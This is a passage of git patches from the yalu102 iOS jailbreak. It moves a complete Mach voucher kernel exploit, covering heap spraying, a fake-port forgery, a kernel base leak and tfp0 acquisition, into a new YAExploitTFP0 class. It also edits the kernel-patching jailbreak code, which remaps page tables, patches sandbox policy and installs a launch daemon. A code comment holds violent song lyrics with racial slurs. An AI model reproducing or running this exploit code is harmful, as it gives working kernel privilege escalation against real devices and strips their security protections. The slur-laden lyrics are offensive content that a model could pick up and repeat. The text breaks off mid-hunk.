msg2.head.msgh_local_port = ports[i]; - kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - if(!(i < 380)) - ports[i] = 0; - assert(kret==0); - } - for (int i = 300; i<380; i+=4) { - msg1.head.msgh_remote_port = ports[i]; - msg1.msgh_body.msgh_descriptor_count = 1; - kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); - assert(kret==0); - } - - mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); - mach_port_t foundport = 0; - for (int i=1; i<500; i++) { - if (ports[i]) { - msg1.head.msgh_local_port = ports[i]; - pthread_yield_np(); - kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); - assert(kret==0); - for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { - mach_port_t* ptz = msg1.desc[k].address; - for (int z = 0; z < 0x100/8; z++) { - if (ptz[z] != MACH_PORT_DEAD) { - if (ptz[z]) { - foundport = ptz[z]; - goto foundp; - } - - } - } - } - mach_msg_destroy(&msg1.head); - mach_port_deallocate(mach_task_self(), ports[i]); - ports[i] = 0; - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -foundp: - NSLog(@"found corruption %x", foundport); - - uint64_t textbase = 0xfffffff007004000; - - for (int i = 0; i < 0x300; i++) { - for (int k = 0; k < 0x40000; k+=8) { - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); - - if (kret != KERN_FAILURE) { - goto gotclock; - } - } - } - [sender setTitle:@"failed, retry" forState:UIControlStateNormal]; - return; - -gotclock:; - uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); - - leaked_ptr &= ~0x3FFF; - - fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; - fakeport->io_references = 0xff; - char* faketask = ((char*)fakeport) + 0x1000; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - *(uint64_t*) (faketask + 0x10) = 0xee; - - while (1) { - int32_t leaked = 0; - *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; - pid_for_task(foundport, &leaked); - if (leaked == MH_MAGIC_64) { - NSLog(@"found kernel text at %llx", leaked_ptr); - break; - } - leaked_ptr -= 0x4000; + self.offsets = [YAKernelOffsets offsetsForCurrentDevice]; + if (!self.offsets) { + [dope setEnabled:NO]; + [dope setTitle:@"kernel unsupported" forState:UIControlStateDisabled]; + return; } - - uint64_t kernel_base = leaked_ptr; - - uint64_t allproc = allproc_offset + kernel_base; - - uint64_t proc_ = allproc; +} - uint64_t kernproc = 0; - - while (proc_) { - uint64_t proc = 0; - - *(uint64_t*) (faketask + procoff) = proc_ - 0x10; - pid_for_task(foundport, (int32_t*)&proc); - *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); - - int pd = 0; - *(uint64_t*) (faketask + procoff) = proc; - pid_for_task(foundport, &pd); - - if (pd == 0){ - kernproc = proc; - } +- (IBAction)yolo:(UIButton*)sender { + mach_port_t _tfp0; + uint64_t _kernbase; + BOOL ok = [YAExploitTFP0 getTaskForPid0WithOffsets:self.offsets + taskPortResult:&_tfp0 + kernelBaseResult:&_kernbase]; + if (ok) { + // via jailbreak.h + tfp0 = _tfp0; + kernbase = _kernbase; + slide = kernbase - 0xFFFFFFF007004000; + allprocs_offset = self.offsets->allproc_offset; + rootvnode_offset = self.offsets->rootvnode_offset; + jailbreak(); - proc_ = proc; - } - - uint64_t kern_task = 0; - *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)&kern_task); - *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); - - uint64_t itk_kern_sself = 0; - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)&itk_kern_sself); - *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; - pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); - - char* faketaskport = malloc(0x1000); - char* ktaskdump = malloc(0x1000); - - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + [dope setEnabled:NO]; + [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; } - for (int i = 0; i < 0x1000/4; i++) { - *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; - pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + else { + [dope setTitle:@"failed, retry?" forState:UIControlStateNormal]; } - - memcpy(fakeport, faketaskport, 0x1000); - memcpy(faketask, ktaskdump, 0x1000); - - mach_port_t pt = 0; - - *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; - *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; - - *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; - - task_get_special_port(foundport, 4, &pt); // get tfp0 - NSLog(@"got tfp0 -> %x", pt); - fakeport->io_bits = 0; - - extern uint64_t slide; - slide = kernel_base - 0xFFFFFFF007004000; - - void yalu_jailbreak(mach_port_t, uint64_t, uint64_t); - exploit(pt, kernel_base, allproc_offset); - - [dope setEnabled:NO]; - [dope setTitle:@"already jailbroken" forState:UIControlStateDisabled]; - } - (void)didReceiveMemoryWarning { diff --git a/yalu102/YAExploitTFP0.h b/yalu102/YAExploitTFP0.h new file mode 100644 index 0000000..309e46d --- /dev/null +++ b/yalu102/YAExploitTFP0.h @@ -0,0 +1,20 @@ +// +// YAExploitTFP0.h +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import +#import + +@class YAKernelOffsets; + +@interface YAExploitTFP0 : NSObject + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase; + +@end diff --git a/yalu102/YAExploitTFP0.m b/yalu102/YAExploitTFP0.m new file mode 100644 index 0000000..712b0fb --- /dev/null +++ b/yalu102/YAExploitTFP0.m @@ -0,0 +1,339 @@ +// +// YAExploitTFP0.m +// yalu102 +// +// Created by qwertyoruiop on 05/01/2017. +// Copyright © 2017 kimjongcracks. All rights reserved. +// + +#import "YAExploitTFP0.h" +#import "YAKernelOffsets.h" +#import +#import +#import + +typedef struct { + mach_msg_header_t head; + mach_msg_body_t msgh_body; + mach_msg_ool_ports_descriptor_t desc[256]; + char pad[4096]; +} sprz; + +typedef natural_t not_natural_t; + +struct not_essers_ipc_object { + not_natural_t io_bits; + not_natural_t io_references; + char io_lock_data[1337]; + + /* + https://www.youtube.com/watch?v=ZADJ8S1qH3U + + + [Intro] + Lets get it + Steve Drive + R.I.P L'A Capone + OTF + These nigga's steady woofing like they want beef, want beef? + You want smoke? You want smoke? Just tell me + + [Hook] + These niggas steady woofing like they want beef, want beef?[You want smoke?] + I can make that happen if you want beef, you want beef?[You want smoke?] + Catch you while you're capping with this semi, semi + Put the semi-automatic to your kidney, kidney + + [Verse 1] + Put the semi-automatic to your kidney, kidney + I'm off the dope I got the pole you talking tough you getting smoked + These nigga's steady woofing like they want beef, but I really know + Glock or nickel yeah that bitch go, I'm going like I'm at a fucking show + I'm off Tu pack saying fuck Jojo[Fuck Jojo] + Talking shit get your life took no joke + I'm with my nigga's and my niggas ain't no joke + And if you got that fucking bag then you getting poked + And if you acting tough, I'ma fucking blow, and that's on Pluto[On Pluto] + Me and Durk finna spaz, and I put that on the guys, it's homicides + Cause we dropping Y's[Die Y, Die Y], head shot got him traumatized + And you want beef?[You want beef fu nigga?] but when I see you, you don't speak?[You don't even talk] + I got my 9 on me[Rondo] and I'ma blow and that's on me[I'm Rondo] + I'm getting tree tree[Getting dope], getting top from a bitch named Kiki + + [Chorus] + + [Verse 2] + And if you really want smoke[You want smoke little nigga?] + I will give your ass smoke[Give your ass smoke little nigga?] + This Glock 9 bitch I tote, and I will put it to your throat + I'm off this Tooka pack and no L'A, I'ma go crazy + You supposed to be my nigga but actin' like a fan that’s crazy + What the fuck wrong with these nigga's, they fugazi + I made this song for the niggas, cause they crazy + Separate me from them niggas[Separate Rondo] + Pull up on your block, with the mops + Then I hit the dip and put him up in case of attempts[Incase a nigga survive] + But we don't make throws, we shoot like Pimp[We shoot to kill] + I got 23[Two three] So i don't fucking speak[I don't speak] + Riding fast, I hit the dash, ain't gon last[You ain't gonna last nigga], I'ma blast[Cause ima blast on a nigga] + Numba Nine, bitch [I'm #9 lil nigga], and I'm a sav, bitch + + [Chorus] + */ +}; + +#define IO_BITS_ACTIVE 0x80000000 +#define IKOT_TASK 2 +#define IKOT_IOKIT_CONNECT 29 +#define IKOT_CLOCK 25 + +char dt[128]; + +@implementation YAExploitTFP0 + ++ (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets + taskPortResult:(mach_port_t*)taskPort + kernelBaseResult:(uint64_t*)kernelBase +{ + const uint64_t procoff = offsets->procoff; + + mach_port_t vch = 0; + + mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); + data->content_size = 0; + data->key=MACH_VOUCHER_ATTR_KEY_BANK; + data->command=610; + data->previous_voucher=MACH_PORT_NULL; + + kern_return_t lol = host_create_mach_voucher(mach_host_self(), + (mach_voucher_attr_raw_recipe_array_t)data, + sizeof(mach_voucher_attr_recipe_data_t), + &vch); + + assert(lol==0 && vch!=0); + + unsigned char* odata = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + unsigned char* fdata = mmap(odata+0x4000, 0x4000, PROT_NONE, MAP_PRIVATE|MAP_ANON|MAP_FIXED, -1, 0); + assert(fdata == odata + 0x4000); + memset(odata, 0x42, 0x0); + + + mach_msg_type_number_t rsz = 0x100; // alloc size; + fdata -= rsz + 0x100; // overflow full chunk + + struct not_essers_ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0); + + mlock(fakeport, 0x8000); + + fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; + fakeport->io_lock_data[12] = 0x11; + + *(uint64_t*) (fdata + rsz) = (uint64_t) fakeport; + + mach_port_t* ports = calloc(800, sizeof(mach_port_t)); + + for (int i = 0; i < 800; i++) { + mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); + mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); + } + + sprz msg1; + + memset(&msg1, 0, sizeof(sprz)); + sprz msg2; + + memset(&msg2, 0, sizeof(sprz)); + msg1.msgh_body.msgh_descriptor_count = 128; + + msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX; + msg1.head.msgh_local_port = MACH_PORT_NULL; + msg1.head.msgh_size = sizeof(msg1)-2048; + + mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t)); + for (int i = 0; i < 0x1000; i++) { + buffer[i] = MACH_PORT_DEAD; + } + + for (int i = 0; i < 256; i++) { + msg1.desc[i].address = buffer; + msg1.desc[i].count = 0x100/8; + msg1.desc[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + msg1.desc[i].disposition = 19; + } + + pthread_yield_np(); + for (int i=1; i<300; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=500; i<800; i++) { + msg1.head.msgh_remote_port = ports[i]; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i=300; i<500; i++) { + msg1.head.msgh_remote_port = ports[i]; + if (i%4 == 0) { + msg1.msgh_body.msgh_descriptor_count = 1; + } else { + msg1.msgh_body.msgh_descriptor_count = 256; + } + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + pthread_yield_np(); + for (int i = 300; i<500; i+=4) { + msg2.head.msgh_local_port = ports[i]; + kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + if(!(i < 380)) + ports[i] = 0; + assert(kret==0); + } + for (int i = 300; i<380; i+=4) { + msg1.head.msgh_remote_port = ports[i]; + msg1.msgh_body.msgh_descriptor_count = 1; + kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0); + assert(kret==0); + } + + mach_voucher_extract_attr_recipe_trap(vch, MACH_VOUCHER_ATTR_KEY_BANK, fdata, &rsz); + mach_port_t foundport = 0; + for (int i=1; i<500; i++) { + if (ports[i]) { + msg1.head.msgh_local_port = ports[i]; + pthread_yield_np(); + kern_return_t kret = mach_msg(&msg1.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0); + assert(kret==0); + for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) { + mach_port_t* ptz = msg1.desc[k].address; + for (int z = 0; z < 0x100/8; z++) { + if (ptz[z] != MACH_PORT_DEAD) { + if (ptz[z]) { + foundport = ptz[z]; + goto foundp; + } + + } + } + } + mach_msg_destroy(&msg1.head); + mach_port_deallocate(mach_task_self(), ports[i]); + ports[i] = 0; + } + } + return NO; + +foundp: + NSLog(@"found corruption %x", foundport); + + const uint64_t textbase = 0xfffffff007004000; + + for (int i = 0; i < 0x300; i++) { + for (int k = 0; k < 0x40000; k+=8) { + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + kern_return_t kret = clock_sleep_trap(foundport, 0, 0, 0, 0); + + if (kret != KERN_FAILURE) { + goto gotclock; + } + } + } + return NO; + +gotclock:; + uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); + + leaked_ptr &= ~0x3FFF; + + fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; + fakeport->io_references = 0xff; + char* faketask = ((char*)fakeport) + 0x1000; + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + *(uint64_t*) (faketask + 0x10) = 0xee; + + while (1) { + int32_t leaked = 0; + *(uint64_t*) (faketask + procoff) = leaked_ptr - 0x10; + pid_for_task(foundport, &leaked); + if (leaked == MH_MAGIC_64) { + NSLog(@"found kernel text at %llx", leaked_ptr); + break; + } + leaked_ptr -= 0x4000; + } + + *kernelBase = leaked_ptr; + uint64_t allproc = offsets->allproc_offset + *kernelBase; + uint64_t proc_ = allproc; + uint64_t kernproc = 0; + + while (proc_) { + uint64_t proc = 0; + + *(uint64_t*) (faketask + procoff) = proc_ - 0x10; + pid_for_task(foundport, (int32_t*)&proc); + *(uint64_t*) (faketask + procoff) = 4 + proc_ - 0x10; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&proc)) + 4)); + + int pd = 0; + *(uint64_t*) (faketask + procoff) = proc; + pid_for_task(foundport, &pd); + + if (pd == 0){ + kernproc = proc; + } + + proc_ = proc; + } + + uint64_t kern_task = 0; + *(uint64_t*) (faketask + procoff) = kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)&kern_task); + *(uint64_t*) (faketask + procoff) = 4 + kernproc - 0x10 + 0x18; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&kern_task)) + 4)); + + uint64_t itk_kern_sself = 0; + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)&itk_kern_sself); + *(uint64_t*) (faketask + procoff) = 4 + kern_task - 0x10 + 0xe8; + pid_for_task(foundport, (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); + + char* faketaskport = malloc(0x1000); + char* ktaskdump = malloc(0x1000); + + for (int i = 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = itk_kern_sself - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&faketaskport[i*4])); + } + for (int i = 0; i < 0x1000/4; i++) { + *(uint64_t*) (faketask + procoff) = kern_task - 0x10 + i*4; + pid_for_task(foundport, (int32_t*)(&ktaskdump[i*4])); + } + + memcpy(fakeport, faketaskport, 0x1000); + memcpy(faketask, ktaskdump, 0x1000); + + *(uint64_t*)(((uint64_t)fakeport) + 0x68) = (uint64_t)faketask; + *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; + + *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; + + task_get_special_port(foundport, 4, taskPort); // get tfp0 + NSLog(@"got tfp0 -> %x", *taskPort); + + fakeport->io_bits = 0; + + return YES; +} + +@end diff --git a/yalu102/YAKernelOffsets.h b/yalu102/YAKernelOffsets.h new file mode 100644 index 0000000..4d2f611 --- /dev/null +++ b/yalu102/YAKernelOffsets.h @@ -0,0 +1,20 @@ +// +// YAKernelOffsets.h +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import +#import + +@interface YAKernelOffsets : NSObject { +@public + uint64_t allproc_offset; + uint64_t procoff; + uint64_t rootvnode_offset; +} + ++ (instancetype)offsetsForCurrentDevice; + +@end diff --git a/yalu102/YAKernelOffsets.m b/yalu102/YAKernelOffsets.m new file mode 100644 index 0000000..dc430cb --- /dev/null +++ b/yalu102/YAKernelOffsets.m @@ -0,0 +1,43 @@ +// +// YAKernelOffsets.m +// yalu102 +// +// Created by mologie on 29/01/2017. +// + +#import "YAKernelOffsets.h" +#import + +@implementation YAKernelOffsets + ++ (instancetype)offsetsForCurrentDevice { + struct utsname u = { 0 }; + uname(&u); + return [self offsetsForKernelVersion:[NSString stringWithUTF8String:u.version]]; +} + ++ (instancetype)offsetsForKernelVersion:(NSString *)version { + NSString *kernelsPlistFile = [[NSBundle bundleForClass:self.class] pathForResource:@"Kernels" ofType:@"plist"]; + NSDictionary *kernels = [NSDictionary dictionaryWithContentsOfFile:kernelsPlistFile]; + NSDictionary *kernel = kernels[version]; + if (kernel) { + YAKernelOffsets *offsets = [[YAKernelOffsets alloc] init]; + offsets->allproc_offset = [self parseOffset:kernel[@"allproc"]]; + offsets->procoff = 0x360; + offsets->rootvnode_offset = [self parseOffset:kernel[@"rootvnode"]]; + return offsets; + } else { + return nil; + } +} + ++ (uint64_t)parseOffset:(NSString *)offset { + NSScanner* scanner = [NSScanner scannerWithString:offset]; + if ([offset hasPrefix:@"0x"]) + scanner.scanLocation = 2; + uint64_t result = 0; + [scanner scanHexLongLong:&result]; + return result; +} + +@end diff --git a/yalu102/jailbreak.h b/yalu102/jailbreak.h index 0e0f23c..591864a 100644 --- a/yalu102/jailbreak.h +++ b/yalu102/jailbreak.h @@ -4,4 +4,10 @@ #import #import -void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs); +extern mach_port_t tfp0; +extern uint64_t kernbase; +extern uint64_t slide; +extern uint64_t allprocs_offset; +extern uint64_t rootvnode_offset; + +void jailbreak(void); diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index e6844ef..9dd61ed 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -10,7 +10,6 @@ #import #import #import -#import #import #import #import @@ -24,15 +23,15 @@ #import "mac_policy.h" #import "patchfinder64.h" #import "csflags.h" +#import "mach_vm.h" -mach_port_t tfp0=0; -uint64_t slide=0; -io_connect_t funcconn=0; +uint64_t slide; +mach_port_t tfp0; +uint64_t kernbase; +uint64_t allprocs_offset; +uint64_t rootvnode_offset; -kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); -kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); -kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); -kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); +io_connect_t funcconn=0; uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) { @@ -89,7 +88,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) +void jailbreak(void) { io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); @@ -97,13 +96,11 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) funcconn = 0; IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); assert(funcconn); - - tfp0 = pt; - + uint64_t bsd_task=0; uint64_t launchd_task = 0; { - uint64_t proc = ReadAnywhere64(allprocs+kernbase); + uint64_t proc = ReadAnywhere64(allprocs_offset+kernbase); NSLog(@"found procs at %llx", proc); while (proc) { uint32_t pid = ReadAnywhere32(proc+0x10); @@ -667,7 +664,6 @@ void exploit(mach_port_t pt, uint64_t kernbase, uint64_t allprocs) { // mount patch - extern uint64_t rootvnode_offset; uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); struct utsname uts; diff --git a/yalu102/mach_vm.h b/yalu102/mach_vm.h new file mode 100644 index 0000000..301a23a --- /dev/null +++ b/yalu102/mach_vm.h @@ -0,0 +1,9 @@ + +#pragma once + +#include + +kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); +kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); +kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); +kern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags); From b4d9e18f340e2ea98a72c47f72a6c755e6c6c041 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:35 +0100 Subject: [PATCH 14/34] Cosmetics --- yalu102/jailbreak.m | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 9dd61ed..4571588 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -483,7 +483,7 @@ void jailbreak(void) TTE_SET(tte, TTE_BLOCK_ATTR_UXN_MASK, 0);\ TTE_SET(tte, TTE_BLOCK_ATTR_PXN_MASK, 0);\ WriteAnywhere64(tte_addr, tte);\ - NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ + NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ }, level1_table, isvad ? 1 : 2); level1_table = physp - gPhysBase + gVirtBase; @@ -747,7 +747,7 @@ void jailbreak(void) } { NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; - char* jl = [jlaunchctl UTF8String]; + const char* jl = [jlaunchctl UTF8String]; unlink("/usr/libexec/reload"); copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); chmod("/usr/libexec/reload", 0755); @@ -756,7 +756,7 @@ void jailbreak(void) } { NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; - char* jl = [jlaunchctl UTF8String]; + const char* jl = [jlaunchctl UTF8String]; unlink("/Library/LaunchDaemons/0.reload.plist"); copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); chmod("/Library/LaunchDaemons/0.reload.plist", 0644); @@ -773,6 +773,7 @@ void jailbreak(void) chmod("/private/var/mobile/Library/Preferences", 0777); system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); + WriteAnywhere64(bsd_task+0x100, orig_cred); sleep(2); From 8e75885ceecbc612fd9e68ade9bf697c21240fe6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:43 +0100 Subject: [PATCH 15/34] =?UTF-8?q?Don=E2=80=99t=20make=20tar=20world-writab?= =?UTF-8?q?le?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- yalu102/jailbreak.m | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 4571588..5ef90c5 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -711,7 +711,7 @@ void jailbreak(void) unlink("/bin/launchctl"); copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); - chmod("/bin/tar", 0777); + chmod("/bin/tar", 0755); jl="/bin/tar"; // chdir("/"); From 45def2bbaa60804fab1a0017758d689043b3b2fc Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 16:47:56 +0100 Subject: [PATCH 16/34] Fix app installation --- yalu102.xcodeproj/project.pbxproj | 2 -- 1 file changed, 2 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 4c3622e..f41c659 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -7,7 +7,6 @@ objects = { /* Begin PBXBuildFile section */ - A70DFA9E1E3D332500769FE9 /* include in Resources */ = {isa = PBXBuildFile; fileRef = A70DFA9D1E3D332500769FE9 /* include */; }; A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */ = {isa = PBXBuildFile; fileRef = A70DFAA01E3D35AC00769FE9 /* Kernels.plist */; }; A70DFAAB1E3E35C200769FE9 /* YAKernelOffsets.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAA1E3E35C200769FE9 /* YAKernelOffsets.m */; }; A70DFAAF1E3E3B8900769FE9 /* YAExploitTFP0.m in Sources */ = {isa = PBXBuildFile; fileRef = A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */; }; @@ -216,7 +215,6 @@ EA9900F61E1E9F060056FEBD /* LaunchScreen.storyboard in Resources */, A70DFAA11E3D35AC00769FE9 /* Kernels.plist in Resources */, EA1A3BAD1E399006009CA025 /* reload in Resources */, - A70DFA9E1E3D332500769FE9 /* include in Resources */, EA1A3BC51E39D1FF009CA025 /* Assets.xcassets in Resources */, EA9900F11E1E9F060056FEBD /* Main.storyboard in Resources */, ); From 44697cfb6780db248c1cd31c7b2bf6baea0350ba Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 16:41:22 +0100 Subject: [PATCH 17/34] hit that blunt # Conflicts: # yalu102/jailbreak.m --- yalu102/jailbreak.m | 38 ++++++++++++++++++++++++++++++-------- 1 file changed, 30 insertions(+), 8 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 5ef90c5..625ec3d 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -461,7 +461,7 @@ void jailbreak(void) #define PMK (PSZ-1) -#define RemapPage(address) \ +#define RemapPage_(address) \ pagestuff_64((address) & (~PMK), ^(vm_address_t tte_addr, int addr) {\ uint64_t tte = ReadAnywhere64(tte_addr);\ if (!(TTE_GET(tte, TTE_IS_TABLE_MASK))) {\ @@ -485,11 +485,31 @@ void jailbreak(void) WriteAnywhere64(tte_addr, tte);\ NSLog(@"level %llx - %llx", tte_addr, TTE_GET(tte, TTE_PHYS_VALUE_MASK));\ }, level1_table, isvad ? 1 : 2); + +#define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) + + uint64_t* remappage = calloc(512, 8); + + int remapcnt = 0; + + +#define RemapPage(x)\ + {\ + int fail = 0;\ + for (int i = 0; i < remapcnt; i++) {\ + if (remappage[i] == (x & (~PMK))) {\ + fail = 1;\ + }\ + }\ + if (fail == 0) {\ + RemapPage_(x);\ + remappage[remapcnt++] = (x & (~PMK));\ + }\ + } level1_table = physp - gPhysBase + gVirtBase; WriteAnywhere64(ReadAnywhere64(pmap_store), level1_table); -#define NewPointer(origptr) (((origptr) & PMK) | findphys_real(origptr) - gPhysBase + gVirtBase) uint64_t shtramp = kernbase + mh_kern->sizeofcmds + sizeof(struct mach_header_64); RemapPage(gadget_base + cpacr_idx*4); @@ -598,13 +618,15 @@ void jailbreak(void) */ uint64_t sbops = find_sbops(); - uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops); - - uint64_t nopag = sbops_end - sbops; - - for (int i = 0; i < nopag; i+= PSZ) { - RemapPage(((sbops + i) & (~PMK))); + uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; + + uint64_t nopag = 